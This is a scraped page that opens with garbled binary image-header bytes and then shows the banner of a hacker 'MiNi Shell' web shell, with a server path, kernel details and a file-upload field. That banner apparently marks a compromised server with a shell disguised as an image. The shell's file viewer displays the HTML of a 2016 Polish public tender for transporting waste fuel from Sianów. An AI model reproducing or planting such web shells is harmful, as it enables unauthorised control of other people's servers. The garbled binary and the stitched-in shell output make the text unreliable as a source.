JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160203/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160203/11613-N-2016.html

<p class="kh_header"><b>Koszalin: Spedycja i transport odpadów energetycznych w tym paliwa alternatywnego wytworzonych w Regionalnym Zakładzie Odzysku Odpadów w Sianowie</b><br>
<b>Numer ogłoszenia: 11613 - 2016; data zamieszczenia: 03.02.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Gospodarki Komunalnej Sp. z o.o. , ul. Komunalna 5, 75-724 Koszalin, woj. zachodniopomorskie, tel. 94 3484444, faks 94 3484434.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pgkkoszalin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Spedycja i transport odpadów energetycznych w tym paliwa alternatywnego wytworzonych w Regionalnym Zakładzie Odzysku Odpadów w Sianowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Spedycja i Transport odpadów energetycznych w tym paliwa alternatywnego wytworzonych w Regionalnym Zakładzie Odzysku Odpadów w Sianowie, przy ul. Łubuszan 80 od dnia zawarcia umowy(1) do dnia wyczerpania zakresu ilościowego 
tj. 2900 Mg odpadów lub zapewnionej minimalnej ilości 60 % (1740 Mg), jednak nie dłużej niż do dnia: 31.12.2016 r.
  Terminem rozpoczęcia realizacji umowy będzie data przekazania pierwszego harmonogramu
  Wykonawcy.
(1)  - terminem rozpoczęcia realizacji umowy będzie data przekazania pierwszego harmonogramu dla Wykonawcy

Zamawiający zakłada w okresie realizacji przedmiotu zamówienia odpadów energetycznych w tym paliwa alternatywnego w ilości do 2900 Mg, do odbiorcy  oddalonego od Zamawiającego o około 550 km. Odległość może ulec zmianie w granicach ? 100 km.
Transportujący jest zobowiązany do odbioru odpadu w ilości minimum 40 Mg tygodniowo. Ilość ta może ulec zmianie po uprzednim uzgodnieniu (10%).  
Załadunek towaru odbywał się będzie w dni robocze i soboty. Minimalna ilość ładunku w jednym kursie na jeden pojazd będzie wynosić 23Mg.
Transport będzie odbywał się na podstawie tygodniowych planów ilościowych dostaw paliwa opracowywanych przez Zamawiającego i przekazywanych Wykonawcy. Przesłany harmonogram będzie traktowany, jako zlecenie na wykonanie zadania. Przy pierwszej dostawie do każdego nowego odbiorcy Wykonawca otrzyma trasę przejazdu od Zamawiającego. Dopuszcza się możliwość zmiany trasy przejazdu na stałe lub okresowo na pisemny wniosek Wykonawcy w przypadku wystąpienia zakazu tonażowego lub objazdu na wyznaczonej trasie. Podstawiony samochód będzie każdorazowo ważony przed załadunkiem    i po nim na zalegalizowanej wadze znajdującej się na terenie Regionalnego Zakładu Odzysku Odpadów w Sianowie, aby określić wagę ładunku. Kierowca otrzyma dokument - WZ(kwit wagowy), wskazujący wagę ładunku. Odbiorca także przekaże Wykonawcy dokument potwierdzający wagę przyjętego ładunku.
Wszelkie obowiązki związane z transportem przyjmie na siebie Wykonawca, a w szczególności:
przygotowanie odpadów energetycznych w tym paliwa alternatywnego do przewozu (odpowiednie zabezpieczenie ładunku),
dostawę odpadów energetycznych w tym paliwa alternatywnego do miejsca przeznaczenia oraz opiekę nad ładunkiem w drodze,
poinformowanie Zleceniodawcy o przewidywanych lub już zaistniałych przeszkodach w przewozie,
przestrzeganie przepisów BHP w szczególności obowiązujących przepisów i procedur              u Odbiorcy,
 wyładunek odpadów energetycznych w tym paliwa alternatywnego w miejscu wskazanym przez odbiorcę.
Transport odpadów energetycznych w tym paliwa alternatywnego musi odbywać się w sposób gwarantujący przestrzeganie ustawy o odpadach (Dz. U. 2013r,poz. 21) - zezwoleniem na prowadzenie działalności w zakresie transportu odpadów na obszarze całego kraju oraz z obowiązującymi przepisami prawa o ruchu drogowym.
Realizacja w  w zamówienia w ramach wynagrodzenia obejmować będzie transport odpadów energetycznych w tym paliwa alternatywnego pojazdami Wykonawcy od miejsca załadunku do miejsca wskazanego przez Zamawiającego.
Załadunek odpadów energetycznych w tym paliwa alternatywnego na samochody Wykonawcy leży po stronie Zamawiającego.  
Na teren RZOO w Sianowie będą mogły wjechać tylko te samochody, które zostały podane w ofercie przetargowej, a każdorazową zmianę środka transportu Wykonawca winien wcześniej zgłosić Zamawiającemu w formie pisemnej. Wykonawca może zmienić środek transportu na równoważny (mający takie same kwalifikacje lub spełniający takie same normy) -  Wykaz jednostek transportowych-załącznik nr 1 do formularza ofertowego
Wykonawca musi posiadać, co najmniej 2 pojazdy dostosowane do wymogów określonych w SIWZ i umowie. Każdy środek transportu musi spełniać wymagania obowiązujących przepisów prawa, a w szczególności być sprawny technicznie oraz spełniać następujące wymagania:
samochód o ładowności nie mniejszej niż 23 Mg, objętości skrzyni ładunkowej powyżej 90m3,
naczepie specjalistycznej typu ruchoma podłoga -przystosowanej do przewozu materiałów sypkich (paliwa alternatywnego) lub naczepie samowyładowczej przystosowanej do przewozu materiałów sypkich ;
zabezpieczoną przed wpływem zewnętrznych warunków atmosferycznych (sucha w środku bez widocznych uszkodzeń i zabrudzeń itp.)
transport dopuszczony do poruszania się po drogach,
szczelny, stabilny uniemożliwiający osuwanie ładunku oraz ich pylenie.
Wszelkie ryzyko związane ze stanem fizycznym odpadów energetycznych w tym paliwa alternatywnego przechodzi na Wykonawcę od chwili podpisania dokumentu - wydania kwitu wagowego i fizycznego odbioru paliwa do momentu potwierdzenia dostarczenia go do Odbiorcy.
W szczególności Wykonawca odpowiada za:
zmianę parametrów odpadów energetycznych w tym paliwa alternatywnego na skutek dostępu wilgoci w trakcie transportu. (Zamawiający pobierze próbkę odpadów w tym paliwa alternatywnego z każdej partii ładunku w obecności kierowcy i będzie ją przetrzymywał przez okres 48 godzin. W przypadku nie przyjęcia przez Odbiorcę ładunku z powodu zbytniego zawilgocenia w  w próbka zostanie przesłana do analizy w celu dokładnego zbadania zawartości wody).
utratę lub ubytek (dopuszcza się każdorazowy ubytek masy w trakcie transportu do 3%)
opóźnienia w podstawieniu środków transportu do załadunku.
zagubienia lub zniszczenia dokumentów potwierdzających przyjęcie ładunku przez Odbiorcę (odtworzenie dokumentów lub płaci za wartość powierzonego towaru wg obowiązujących cen u odbiorcy) - Zamawiający nie płaci za kurs. 
opóźnienia w dostawie do Odbiorcy odpadów energetycznych w tym paliwa alternatywnego.
Zamawiający zastrzega sobie prawo kontroli wykonania usługi na każdym etapie jej realizacji.
      Zwrot dokumentów  Wykonawca wraz z fakturą dostarczy:
Komplet dokumentów potwierdzających odbiór odpadów energetycznych w tym paliwa alternatywnego wystawiony przez Odbiorcę,
raport za fakturowany okres z otrzymanych zleceń do realizacji wg załącznika (wzór raportu ZAŁĄCZNIK nr 2),
ewentualne wyjaśnienia dotyczące rozbieżności masy odpadu.
Wykonawca winien zapewnić stały kontakt telefoniczny z wyznaczoną przez siebie osobą pełniącą funkcję koordynującą działania Wykonawcy z Zamawiającym i Odbiorcą.
Wykonawca zapewni ciągłość ubezpieczenia od odpowiedzialności cywilnej z tytułu prowadzonej działalności na kwotę minimum 100 000,00 zł w okresie obowiązywania umowy.
Zamawiający zastrzega sobie prawo do kursu powrotnego z ładunkiem w przypadku, gdy Odbiorca z różnych przyczyn odmówi przyjęcia odpadów energetycznych w tym paliwa alternatywnego (Zamawiający potraktuje tą sytuację jako ten sam kurs bez ponoszenia dodatkowych kosztów).
Zamawiający zobowiązuje się  do realizowania 60% całości zamówienia. tj 1740 Mg 
Zamawiający zastrzega sobie prawo do nie zrealizowania umowy w całości. 
Nie zrealizowanie całego przedmiotu umowy w okresie jej trwania nie powoduje jakichkolwiek roszczeń odszkodowawczych z tego tytułu ze strony Wykonawcy.
Zamawiający ma prawo wstrzymać transport odpadów energetycznych w tym paliwa alternatywnego z powodu awarii linii produkcyjnej odbiorcy bądź Zamawiającego do momentu jej usunięcia. O zaistniałym fakcie zamawiający poinformuje wykonawcę nie później niż w ciągu 12 godzin.
Zamawiający zastrzega sobie prawo do zmiany odbiorcy paliwa. Zmiana odbiorcy nie wymaga aneksu do umowy..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielenia zamówień uzupełniających, w przypadku zaistnienia okoliczności, o których mowa w art. 67 ust. 1 pkt. 6 ustawy Pzp w wielkości 10% zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.20.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wadium  Zamawiający ustala wadium w wysokości: 7.000,00 zł. 
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: Bank Zachodni WBK S.A nr 79150010961214700000490000 Za datę wniesienia wadium uważa się datę wpływu środków na wskazany rachunek bankowy. 
3.Wadium musi obejmować cały okres związania ofertą i może być wniesione 
w jednej lub kilku następujących formach
a) w pieniądzu,
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo -   
    kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancjach bankowych,
d) gwarancjach ubezpieczeniowych,
e) poręczeniach udzielonych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).
4. Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego, przy czym musi to nastąpić do terminu składania ofert. Kopię dowodu dokonania przelewu należy dołączyć do oferty.
5. Jeżeli Wykonawca wnosi wadium w innej formie niż pieniężna odpowiednie dokumenty należy złożyć w sekretariacie Przedsiębiorstwa Gospodarki Komunalnej Spółki z o. o. w Koszalinie, a kserokopię dołączyć do oferty.
6. Wadium wniesione w innej formie niż pieniężna musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w art. 46 ust. 4a i ust. 5 ustawy Prawo zamówień publicznych.
7. Dowód wniesienia wadium zgodnie z zasadami wskazanymi powyżej, należy złożyć wraz z ofertą.
 8. Jeżeli Wykonawca wnosi wadium w innej formie niż pieniężna odpowiednie dokumenty należy złożyć w kasie Przedsiębiorstwa Gospodarki Komunalnej 
Sp. z o.o. w Koszalinie a kserokopię dołączyć do oferty.
UWAGA!: 
Zgodnie z zapisami w PZP, w świetle art. 46 ust. 4a Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej. Ponieważ jest to nowa okoliczność skutkująca zatrzymaniem wadium przez Zamawiającego - gwarant, udzielający wykonawcy gwarancji jest zobowiązany taką okoliczność w wystawianym przez siebie dokumencie przewidzieć. 
Wadium wniesione w innej formie niż pieniądz należy w oryginale złożyć 
w sekretariacie  Przedsiębiorstwa, natomiast kopię załączyć do oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeśli Wykonawca wykaże, że posiada. zezwolenie na prowadzenie działalności w zakresie transportu odpadów o kodzie. EAK 19 12 10 na obszarze całego kraju. (Dz. U. 2013r,poz. 21 z późn. zm)zezwolenie na prowadzenie działalności w zakresie transportu odpadów energetycznych na obszarze całego kraju</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje 
odpowiednim transportem spełniającym wymagania zawarte w przepisach Kodeksu Drogowego i wymaganiach Zamawiającego tj   posiada minimum 2 pojazdy o ładowności nie mniejszej niż 20 Mg, objętości skrzyni ładunkowej   powyżej 90 m3 , ruchomej podłodze przystosowany do przewozu paliwa alternatywnego (RDF)  frakcja wiekszej lub równe 30mm, zabezpieczony przed wpływem warunków atmosferycznych    suchy w środku bez widocznych uszkodzeń i zabrudzeń itp  Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wykazują łącznie spełnianie warunku dotyczącego dysponowania odpowiednim potencjałem technicznym.wykaz posiadanego  potencjału technicznego  I. (jeżeli dotyczy)
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie* tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia podpisane przez te podmioty.

II. jeżeli dotyczy
W przypadku, gdy Wykonawca, oświadczając, że spełnia warunki, o których mowa 
w art. 22 ust.1 ustawy PZP, polega na zasobach innych podmiotów, a podmioty te będą brały udział w realizacji części zamówienia  Zamawiający żąda przedstawienia przez Wykonawcę dokumentu wymienionego w pkt. 5.4.1 oraz 5.4.2 podpisanego przez te podmioty (Wykonawca nie podpisuje dokumentów składanych przez te podmioty 	

III. (jeżeli dotyczy)
Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa w art. 22 ust. 1 pkt 4 ustawy (pkt 5 ppkt 1 lit. d SIWZ), polega na zdolnościach finansowych lub ekonomicznych innych podmiotów niezależnie od charakteru prawnego łączących go z nim stosunków, Zamawiający wymaga przedłożenia informacji dotyczącej zdolności finansowej tych podmiotów poświadczonej,    w przypadku kserokopii, za zgodność z oryginałem przez te podmioty (Wykonawca nie podpisuje dokumentów składanych przez te podmioty).  

UWAGA!
1. W przypadku, gdy złożone przez Wykonawców dokumenty na potwierdzenie spełniania warunków udziału w postępowaniu będą zawierały kwoty wyrażone w walutach innych niż PLN, do oceny spełniania każdego warunku zawierającego daną kwotę lub wartość, wielkości te Wykonawca  przeliczy po średnim kursie waluty obcej ogłoszonym przez NBP w dniu publikacji ogłoszenia w DzUUE.
2. * TREŚĆ ZOBOWIĄZANIA PODMIOTU TRZECIEGO:
powinna określać: 
- kto jest podmiotem przyjmującym zasoby i jaki charakter stosunku będzie łączył wykonawcę z innym podmiotem, 
- zakres dostępnych wykonawcy zasobów innego podmiotu, 
- czego konkretnie dotyczy zobowiązanie,
- w jaki sposób będzie wykorzystany zasób tego podmiotu, w tym jakiego okresu dotyczy.
A w sytuacji gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.
Ponadto zobowiązanie musi zawierać oświadczenie o solidarnej odpowiedzialności
z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeśli Wykonawca wykaże, że posiada opłaconą (na dzień otwarcia ofert)  polisę ubezpieczenia od odpowiedzialności cywilnej prowadzonej działalności gospodarczej o wartości, co najmniej 100.000,00 zł. opłaconą polisę OC wraz z dowodem jej opłaceniaI. (jeżeli dotyczy)
Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie* tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia podpisane przez te podmioty.

II. (jeżeli dotyczy)
W przypadku, gdy Wykonawca, oświadczając, że spełnia warunki, o których mowa 
w art. 22 ust.1 ustawy PZP, polega na zasobach innych podmiotów, a podmioty te będą brały udział w realizacji części zamówienia - Zamawiający żąda przedstawienia przez Wykonawcę dokumentu wymienionego w pkt. 5.4.1) oraz 5.4.2) podpisanego przez te podmioty (Wykonawca nie podpisuje dokumentów składanych przez te podmioty). 	

III. (jeżeli dotyczy)
Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa w art. 22 ust. 1 pkt 4 ustawy (pkt 5 ppkt 1 lit. d SIWZ), polega na zdolnościach finansowych lub ekonomicznych innych podmiotów niezależnie od charakteru prawnego łączących go z nim stosunków, Zamawiający wymaga przedłożenia informacji dotyczącej zdolności finansowej tych podmiotów poświadczonej,    w przypadku kserokopii, za zgodność z oryginałem przez te podmioty (Wykonawca nie podpisuje dokumentów składanych przez te podmioty).  

UWAGA!
1. W przypadku, gdy złożone przez Wykonawców dokumenty na potwierdzenie spełniania warunków udziału w postępowaniu będą zawierały kwoty wyrażone w walutach innych niż PLN, do oceny spełniania każdego warunku zawierającego daną kwotę lub wartość, wielkości te Wykonawca  przeliczy po średnim kursie waluty obcej ogłoszonym przez NBP w dniu publikacji ogłoszenia w DzUUE.
2. * TREŚĆ ZOBOWIĄZANIA PODMIOTU TRZECIEGO:
powinna określać: 
- kto jest podmiotem przyjmującym zasoby i jaki charakter stosunku będzie łączył wykonawcę z innym podmiotem, 
- zakres dostępnych wykonawcy zasobów innego podmiotu, 
- czego konkretnie dotyczy zobowiązanie,
- w jaki sposób będzie wykorzystany zasób tego podmiotu, w tym jakiego okresu dotyczy.
A w sytuacji gdy przedmiotem udzielenia są zasoby nierozerwalnie związane z podmiotem ich udzielającym, niemożliwe do samodzielnego obrotu i dalszego udzielenia ich bez zaangażowania tego podmiotu w wykonanie zamówienia, taki dokument powinien zawierać wyraźne nawiązanie do uczestnictwa tego podmiotu w wykonaniu zamówienia.
Ponadto zobowiązanie musi zawierać oświadczenie o solidarnej odpowiedzialności
z Wykonawcą za szkodę Zamawiającego powstałą wskutek nieudostępnienia zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
